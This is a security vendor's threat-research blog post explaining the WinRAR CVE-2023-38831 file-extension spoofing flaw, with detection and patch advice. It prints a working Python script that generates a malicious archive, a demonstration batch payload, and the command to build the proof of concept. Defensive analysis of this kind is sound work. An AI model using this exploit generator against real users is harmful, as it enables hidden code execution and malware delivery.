<div class="hs_utm_content hs-utm_content hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_content-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_content"
for="utm_content-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_content</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_content" class="hs-input" type="hidden" value=""></div>
</div>
<div class="hs_utm_campaign hs-utm_campaign hs-fieldtype-text field hs-form-field" style="display: none;"><label id="label-utm_campaign-464171ef-7766-4b86-9e48-f51bb13b325f_4495" class="" placeholder="Enter your utm_campaign"
for="utm_campaign-464171ef-7766-4b86-9e48-f51bb13b325f_4495"><span>utm_campaign</span></label>
<legend class="hs-field-desc" style="display: none;"></legend>
<div class="input"><input name="utm_campaign" class="hs-input" type="hidden" value=""></div>
</div>
<div class="legal-consent-container">
<div class="hs-richtext">
<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href="https://www.uptycs.com/privacy" target="_blank">Privacy Policy</a></u>.</p>
</div>
</div>
<div class="hs_submit hs-submit">
<div class="hs-field-desc" style="display: none;"></div>
<div class="actions"><input type="submit" class="hs-button primary large" value="Request a Demo"></div>
</div><input name="hs_context" type="hidden"
value="{"embedAtTimestamp":"1713298179628","formDefinitionUpdatedAt":"1708973699207","lang":"en","legalConsentOptions":"{\"legitimateInterestSubscriptionTypes\":[3136631],\"communicationConsentCheckboxes\":[{\"communicationTypeId\":3136631,\"label\":\"I agree to receive other communications from Uptycs.\",\"required\":false}],\"legitimateInterestLegalBasis\":\"LEGITIMATE_INTEREST_PQL\",\"communicationConsentText\":\"Uptycs is committed to protecting and respecting your privacy, and we’ll only use your personal information to administer your account and to provide the products and services you requested from us. From time to time, we would like to contact you about our products and services, as well as other content that may be of interest to you. If you consent to us contacting you for this purpose, please tick below to say how you would like us to contact you:\",\"processingConsentType\":\"IMPLICIT\",\"processingConsentText\":\"In order to provide you the content requested, we need to store and process your personal data. If you consent to us storing your personal data for this purpose, please tick the checkbox below.\",\"processingConsentCheckboxLabel\":\"I agree to allow Uptycs to store and process my personal data.\",\"privacyPolicyText\":\"<p>You can unsubscribe from Uptycs communications at any time. For information about how Uptycs handles your personal data, please see our <u><a href=\\\"https://www.uptycs.com/privacy\\\" target=\\\"_blank\\\">Privacy Policy</a></u>.</p>\",\"isLegitimateInterest\":true}","embedType":"REGULAR","clonedFromForm":"9f3fffac-7d79-4a57-ac39-94b68261d59a","notifyHubSpotOwner":"true","renderRawHtml":"true","userAgent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36","pageTitle":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","pageId":"133806526071","isHubSpotCmsGeneratedPage":true,"canonicalUrl":"https://www.uptycs.com/blog/winrar-vulnerability-exploitation","contentType":"blog-post","hutk":"bebd24343e2ed718561e5a8f320fe293","__hsfp":726726051,"__hssc":"26386402.1.1713298181281","__hstc":"26386402.bebd24343e2ed718561e5a8f320fe293.1713298181281.1713298181281.1713298181281.1","formTarget":"#hs_form_target_form_134294284","formInstanceId":"4495","rawInlineMessage":"<div style=\"text-align: center;\">\n<div aria-setsize=\"-1\" id=\"1701201608.413599\" data-qa=\"virtual-list-item\" data-item-key=\"1701201608.413599\" tabindex=\"0\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div>\n<div>\n<div data-qa=\"message_content\" role=\"presentation\">\n<div>\n<div data-qa=\"message-text\">\n<div data-qa=\"block-kit-renderer\">\n<div>\n<div dir=\"auto\">\n<div style=\"font-size: 18px;\"><span style=\"color: #ffffff;\">Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\"-1\" id=\"1701201665.858649\" data-qa=\"virtual-list-item\" data-item-key=\"1701201665.858649\" tabindex=\"-1\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div data-stringify-ignore=\"true\" style=\"font-size: 18px;\" role=\"presentation\">&nbsp;</div>\n</div>\n</div>\n</div>\n</div>","hsFormKey":"5b517c9b8f80019bee1c3f2daa44d80e","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","dateFields":"became_an_mql_date","rumScriptExecuteTime":1339.6999969482422,"rumTotalRequestTime":1746.599998474121,"rumTotalRenderTime":1985.1999969482422,"rumServiceResponseTime":406.9000015258789,"rumFormRenderTime":238.5999984741211,"connectionType":"4g","firstContentfulPaint":0,"largestContentfulPaint":0,"locale":"en","timestamp":1713298181295,"originalEmbedContext":{"portalId":"2617658","formId":"464171ef-7766-4b86-9e48-f51bb13b325f","region":"na1","target":"#hs_form_target_form_134294284","isBuilder":false,"isTestPage":false,"isPreview":false,"formInstanceId":"4495","formsBaseUrl":"/_hcms/forms","css":"","inlineMessage":"<div style=\"text-align: center;\">\n<div aria-setsize=\"-1\" id=\"1701201608.413599\" data-qa=\"virtual-list-item\" data-item-key=\"1701201608.413599\" tabindex=\"0\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div>\n<div>\n<div data-qa=\"message_content\" role=\"presentation\">\n<div>\n<div data-qa=\"message-text\">\n<div data-qa=\"block-kit-renderer\">\n<div>\n<div dir=\"auto\">\n<div style=\"font-size: 18px;\"><span style=\"color: #ffffff;\">Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\"-1\" id=\"1701201665.858649\" data-qa=\"virtual-list-item\" data-item-key=\"1701201665.858649\" tabindex=\"-1\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div data-stringify-ignore=\"true\" style=\"font-size: 18px;\" role=\"presentation\">&nbsp;</div>\n</div>\n</div>\n</div>\n</div>","isMobileResponsive":true,"rawInlineMessage":"<div style=\"text-align: center;\">\n<div aria-setsize=\"-1\" id=\"1701201608.413599\" data-qa=\"virtual-list-item\" data-item-key=\"1701201608.413599\" tabindex=\"0\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div>\n<div>\n<div data-qa=\"message_content\" role=\"presentation\">\n<div>\n<div data-qa=\"message-text\">\n<div data-qa=\"block-kit-renderer\">\n<div>\n<div dir=\"auto\">\n<div style=\"font-size: 18px;\"><span style=\"color: #ffffff;\">Great! Well get back to you soon.</span></div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n<div aria-setsize=\"-1\" id=\"1701201665.858649\" data-qa=\"virtual-list-item\" data-item-key=\"1701201665.858649\" tabindex=\"-1\" role=\"listitem\">\n<div data-qa=\"message_container\" data-qa-unprocessed=\"false\" data-qa-placeholder=\"false\" role=\"presentation\">\n<div data-qa-hover=\"true\" role=\"document\" aria-roledescription=\"message\">\n<div data-stringify-ignore=\"true\" style=\"font-size: 18px;\" role=\"presentation\">&nbsp;</div>\n</div>\n</div>\n</div>\n</div>","hsFormKey":"5b517c9b8f80019bee1c3f2daa44d80e","pageName":"WinRAR Vulnerability Exploitation: Decode & Bolster Protection","pageId":"133806526071","contentType":"blog-post","formData":{"cssClass":"hs-form stacked hs-custom-form"},"isCMSModuleEmbed":true},"correlationId":"3b848806-0722-4949-a72e-4881906c88f1","renderedFieldsIds":["firstname","lastname","email","phone","company","how_did_you_hear_about_uptycs_","company_hq___state","jobtitle","numberofemployees","became_an_mql_date","honeypot_queue","ld_bookit_log_id","utm_source","utm_medium","utm_content","utm_campaign"],"captchaStatus":"NOT_APPLICABLE","emailResubscribeStatus":"NOT_APPLICABLE","isInsideCrossOriginFrame":false,"source":"forms-embed-1.5064","sourceName":"forms-embed","sourceVersion":"1.5064","sourceVersionMajor":"1","sourceVersionMinor":"5064","allPageIds":{"embedContextPageId":"133806526071","analyticsPageId":"133806526071","contentPageId":133806526071,"contentAnalyticsPageId":"133806526071"},"_debug_embedLogLines":[{"clientTimestamp":1713298179893,"level":"INFO","message":"Retrieved customer callbacks used on embed context: [\"getExtraMetaDataBeforeSubmit\"]"},{"clientTimestamp":1713298179894,"level":"INFO","message":"Retrieved pageContext values which may be overriden by the embed context: {\"pageTitle\":\"WinRAR Vulnerability Exploitation: Decode & Bolster Protection\",\"pageUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"userAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36\",\"pageId\":\"133806526071\",\"contentAnalyticsPageId\":\"133806526071\",\"contentPageId\":133806526071,\"isHubSpotCmsGeneratedPage\":true}"},{"clientTimestamp":1713298179897,"level":"INFO","message":"Retrieved countryCode property from normalized embed definition response: \"DE\""},{"clientTimestamp":1713298181288,"level":"INFO","message":"Retrieved analytics values from API response which may be overriden by the embed context: {\"hutk\":\"bebd24343e2ed718561e5a8f320fe293\",\"canonicalUrl\":\"https://www.uptycs.com/blog/winrar-vulnerability-exploitation\",\"contentType\":\"blog-post\",\"pageId\":\"133806526071\"}"}]}"><iframe
name="target_iframe_464171ef-7766-4b86-9e48-f51bb13b325f_4495" style="display: none;"></iframe>
</form>Text Content
×
This website stores cookies on your computer. These cookies are used to collect
information about how you interact with our website and allow us to remember
you. We use this information in order to improve and customize your browsing
experience and for analytics and metrics about our visitors both on this website
and other media. To find out more about the cookies we use, see our Privacy
Policy
If you decline, your information won’t be tracked when you visit this website. A
single cookie will be used in your browser to remember your preference not to be
tracked.
Accept Decline
* Why Uptycs?
* Products Show submenu for Products
HYBRID CLOUD SECURITY PLATFORM
* CNAPP Overview
* Workload Protection (CWPP)
* Container and K8s Security (KSPM)
* Posture Management (CSPM)
* Entitlement Management (CIEM)
* Threat Detection and Response (CDR)
ENDPOINT SECURITY
* XDR Overview
* Workspace and Workload Security
* IBM Power, Linux on Z, LinuxONE, and AIX
* Uptycs XDR vs. The Old Way
* Solutions Show submenu for Solutions
BY USE CASE
* Compliance
* Vulnerability Management
* Detection and Response
* Threat Hunting
* Forensic Investigation
* Managed Services (MDR)
BY ENVIRONMENT
* AWS
* Azure
* Google Cloud
* IBM
* Partners
* Resources Show submenu for Resources
RESOURCES
* Resource Center
* Customer Stories
* Blog
* Events and Webinars
* Reviews
COMMUNITY
* osquery Community
* osquery: what is it
* Cybersecurity Standup
FEATURED
KuppingerCole positions Uptycs a CSPM Technology Leader
* Company Show submenu for Company
* Overview
* Press and News
* Contact Us
* Support
* Training
* Careers
* Security Practices
* Why Uptycs?
* Products Show submenu for Products
HYBRID CLOUD SECURITY PLATFORM
* CNAPP Overview
* Workload Protection (CWPP)
* Container and K8s Security (KSPM)
* Posture Management (CSPM)
* Entitlement Management (CIEM)
* Threat Detection and Response (CDR)
ENDPOINT SECURITY
* XDR Overview
* Workspace and Workload Security
* IBM Power, Linux on Z, LinuxONE, and AIX
* Uptycs XDR vs. The Old Way
* Solutions Show submenu for Solutions
BY USE CASE
* Compliance
* Vulnerability Management
* Detection and Response
* Threat Hunting
* Forensic Investigation
* Managed Services (MDR)
BY ENVIRONMENT
* AWS
* Azure
* Google Cloud
* IBM
* Partners
* Resources Show submenu for Resources
RESOURCES
* Resource Center
* Customer Stories
* Blog
* Events and Webinars
* Reviews
COMMUNITY
* osquery Community
* osquery: what is it
* Cybersecurity Standup
FEATURED
KuppingerCole positions Uptycs a CSPM Technology Leader
* Company Show submenu for Company
* Overview
* Press and News
* Contact Us
* Support
* Training
* Careers
* Security Practices
Request a demo
INSIDE THE WINRAR VULNERABILITY: DECODING & BOLSTERING PROTECTION
Tags: Threats
UPTYCS THREAT RESEARCH
September 08, 2023
Share:
*
*
*
*
Authors: Siddartha Malladi and Arpit Kataria
It’s been two weeks since researchers uncovered a high severity security flaw in
the WinRAR utility that cyber adversaries are using to exploit the trusted ZIP
archive format for malicious code execution. With active exploits currently
underway, organizations are urged to update their software.
The sheer ubiquity of WinRAR in corporate settings makes this vulnerability an
urgent concern. What sets this issue apart is its deceptive simplicity: an
attacker can mask malicious scripts within a ZIP file, misleading both users and
rudimentary security controls. Initial reports indicate that this technique has
been weaponized against specialized online communities like those focused on
cryptocurrency and stock trading.
Our deep-dive analysis offers not only a comprehensive understanding of the
vulnerability but also practical steps for detection and mitigation. This is
more than just another vulnerability explainer; consider it a comprehensive
guide for cybersecurity professionals who need to understand the 'how' and 'why'
behind CVE-2023-38831. Armed with this knowledge, you'll be better prepared to
thwart attackers aiming to exploit this vulnerability in your organization.
UNDERSTANDING THE WINRAR VULNERABILITY
The recently unveiled WinRAR vulnerability, tracked as CVE-2023-38831, poses a
unique challenge for cybersecurity professionals. This flaw disrupts WinRAR's
handling of file extensions, opening doors for unauthorized code execution. What
makes it particularly insidious is its ability to hide malicious executables
within seemingly benign files, such as .PDFs or .JPGs, in an archive.
Recent evidence indicates that threat actors are capitalizing on this
vulnerability to target cryptocurrency and stock trading communities, deploying
malicious payloads like DarkMe, GuLoader, and Remcos RAT. These exploits have
been on the rise from April to August 2023, magnifying the urgency for effective
mitigation strategies among security teams.
CVE-2023-38831: TECHNICAL INSIGHTS
Cybercriminals are exploiting a security loophole in WinRAR that enables file
extension spoofing. This deceptive technique enables them to embed malicious
code in an archive disguised as a benign ".jpg", ".txt", or other commonly
recognized file types. They package both benign and malicious files within a
single ZIP archive. When victims open this malicious package, they see what
seems like an image file and a folder with the same name as the image.
Figure1 – Exploitation flow of CVE-2023-38831
Figure 2 – Malicious RAR file
This RAR contains image.jpg file and image.jpg folder. The image.jpg file is a
decoy file and the image.jpg folder acts as script carrier. The folder houses a
script set to execute upon the opening of the decoy file.
Figure 3 – Victim opening image.jpg file
In this demonstration, clicking on the image.jpg file opens not only a decoy
image but also executes a script. This script triggers a dialog box that
displays the message "Exploited CVE-2023-38831".
Note that this is merely a demonstration. In a real-world scenario, a threat
actor could design the script to display an image while clandestinely running a
script to download malware in the background.
EXPLOITATION MECHANICS
Now let’s dive into the details of how the exploitation works
* Within the ZIP archive, a file with the name “image.jpg” exists; however, a
trailing space is intentionally added, making it “image.jpg ”.
* Inside the ZIP archive, there's a folder "image.jpg " that has a file inside.
This file contains malicious code, such as a script designed to download
malware. This file has the same name as the tricky file above, but with extra
stuff at the end, like "image.jpg .cmd ". Importantly, the trailing space is
intentionally included as part of the filename.
* When an application like WinRAR processes the ZIP archive, it encounters the
deceptive “image.jpg “ file and fails to properly handle the trailing space,
leading to the vulnerability.
* Due to this improper handling, WinRAR executes unintended actions. It follows
the instructions in the tricky file ("image.jpg .cmd ") without realizing
it's bad. These instructions make the computer run a program that it
shouldn't. Note: The exploit is only triggered if the victim both opens the
RAR archive and accesses the image file specifically within WinRAR.
Once the victim clicks on the image.jpg file, WinRAR triggers the following
command: cmd.exe /c
C:\Users\<user>\AppData\Local\Temp\Rar$DIa6116.27667\image.jpg .cmd.
Figure 4 – Inside image.jpg folder
To execute the previously outlined attack vector, we can utilize the following
Python exploit script coupled with a batch payload script.
Exploit Script:
import shutil
import os
import sys
from os.path import join
def generate_exploit(folder_name, decoy_filename, payload_filename,
output_filename):
decoy_ext = os.path.splitext(decoy_filename)[1].encode("utf-8")
if os.path.exists(folder_name):
shutil.rmtree(folder_name)
os.mkdir(folder_name)
sub_dir = join(folder_name, decoy_filename + "1")
if not os.path.exists(sub_dir):
os.mkdir(sub_dir)
shutil.copyfile(join(payload_filename), join(sub_dir,
decoy_filename+"1.cmd"))
shutil.copyfile(join(decoy_filename), join(folder_name, decoy_filename+"2"))
shutil.make_archive(folder_name, 'zip', folder_name)
with open(folder_name + ".zip", "rb") as f:
content = f.read()
content = content.replace(decoy_ext + b"1", decoy_ext + b" ")
content = content.replace(decoy_ext + b"2", decoy_ext + b" ")
os.remove(folder_name + ".zip")
with open(output_filename, "wb") as f:
f.write(content)
print("Exploit generated successfully:", output_filename)
def main():
if len(sys.argv) < 4:
print("""Usage:
python .\exploit.py <decoy_filename> <payload_filename>
<output_filename>""")
else:
if len(sys.argv) != 4:
print("Invalid number of parameters.")
else:
folder_name = "Malicious_file"
decoy_filename = os.path.basename(sys.argv[1])
payload_filename = os.path.basename(sys.argv[2])
output_filename = os.path.basename(sys.argv[3])
generate_exploit(folder_name, decoy_filename, payload_filename,
output_filename)
if __name__ == "__main__":
main()
Payload script:
echo x=msgbox(" Exploited the CVE-2023-38831 " ,0, "WinRAR") >>
msgbox.vbs &
start msgbox.vbs &
image.jpg
Save the Python script as exploit.py and batch file as payload.bat.
Additionally, place an image file renamed to image.jpg in the same folder. Now
run the following command in order to generate a malicious RAR file:
python .\exploit.py image.jpg payload.bat poc.rar
The Python script employs several tactics. Firstly, it creates a directory named
"Malicious_file," into which it places a duplicate of the image file, now
renamed to "image.jpg1". It also generates a sub-directory, "image.jpg2" which
houses a hidden payload named "image.jpg .cmd." The script then compresses these
contents into a ZIP archive. In the final step, it subtly modifies the file
names by replacing numerical suffixes with trailing spaces, exploiting the
vulnerability.
DETECTION THROUGH UPTYCS XDR
Should your system have a vulnerable version of WinRAR, Uptycs XDR offers robust
vulnerability scanning features for timely detection. Uptycs XDR stores
vulnerability scan results in a dedicated table, accessible via SQL queries, as
shown below:
select cve_list, package_name, package_version, cvss_score, os from
vulnerabilities where cve_list = 'CVE-2023-38831'
Figure 5 – Detection of CVE-2023-38831 using vulnerability scan
To remediate this issue, RARlab has issued WinRAR version 6.23; all preceding
versions remain vulnerable.
Figure 6 – Detection of exploitation of the vulnerability
CONCLUSION
In summary, the CVE-2023-38831 vulnerability in WinRAR underscores the
increasingly sophisticated tactics employed by cybercriminals. By exploiting
file extension spoofing, they are able to embed malicious code within seemingly
benign files. This serves as a cautionary tale for security teams, particularly
those protecting environments where sensitive financial transactions occur, such
as trading platforms.
As threat actors evolve their techniques, it becomes increasingly imperative for
cybersecurity professionals to maintain up-to-date software, implement robust
security measures, and foster a culture of cybersecurity awareness within their
organizations.
RECOMMENDED CONTENT
MASTERING CLOUD SECURITY: THE SERIES
Read More
MASTERING KUBERNETES SECURITY: THE SERIES
Read More
THE CISO PLAYBOOK: SECURITY, COMPLIANCE & EFFICIENCY
Read More
SIGN UP FOR A DEMO
SIGN UP HERE:
First name*
Last name*
Work Email*
Phone number
Company name*
My security priority is:
How did you hear about us?
Company HQ - State
Job title
Employees
Became an MQL date
What color is the sky?
LD BookIt Log ID
utm_source
utm_medium
utm_content
utm_campaign
You can unsubscribe from Uptycs communications at any time. For information
about how Uptycs handles your personal data, please see our Privacy Policy.
STAY IN THE LOOP
Get regular updates on all things Uptycs—
from product updates to expert articles and much more
Work Email*
What color is the sky?
PRODUCTS
CLOUD SECURITY
* Overview
* Workload Protection (CWPP)
* Container and K8s Security (KSPM)
* Posture Management (CSPM)
* Entitlement Management (CIEM)
* Threat Detection and Response (CDR)
ENDPOINT SECURITY
* Overview
* Workspace and Workload Security
* IBM Power, Linux on Z, LinuxONE, and AIX
* Uptycs XDR vs. The Old Way
SOLUTIONS
BY USE CASE
* Compliance
* Asset Management
* Vulnerability Management
* Detection and Response
* Threat Hunting
* Forensic Investigation
* Managed Services (MDR)
BY PLATFORM
* AWS
* Azure
* Google Cloud
* IBM
RESOURCES
RESOURCE CENTER
* Resource Center
* Customer Stories
* Blog
COMMUNITY
* Events
* osquery Community
* osquery: what is it
* Cybersecurity Standup
COMPANY
* Overview
* Partners
* Press and News
* Contact Us
* Support
* Training
* Careers
* Security Practices
* Terms of Service
WHY UPTYCS?
FOLLOW US
*
*
*
*
© 2024 Uptycs. All rights reserved.
* Privacy Policy
* Security Practices
* Contact Us
×
CONNECT WITH A SECURITY EXPERT
First name*
Last name*
Work Email*
Phone number
Company name*
How did you hear about Uptycs?
Company HQ - State
Job title
Employees
Became an MQL date
What color is the sky?
LD BookIt Log ID
utm_source
utm_medium
utm_content
utm_campaign
You can unsubscribe from Uptycs communications at any time. For information
about how Uptycs handles your personal data, please see our Privacy Policy.
Also of Interest
* Protect Your Cloud: Get Inside the Mind of a...
* Uptycs Quarterly Threat Bulletin Details...
* WinRAR CVE-2023-38831 Vulnerability Draws...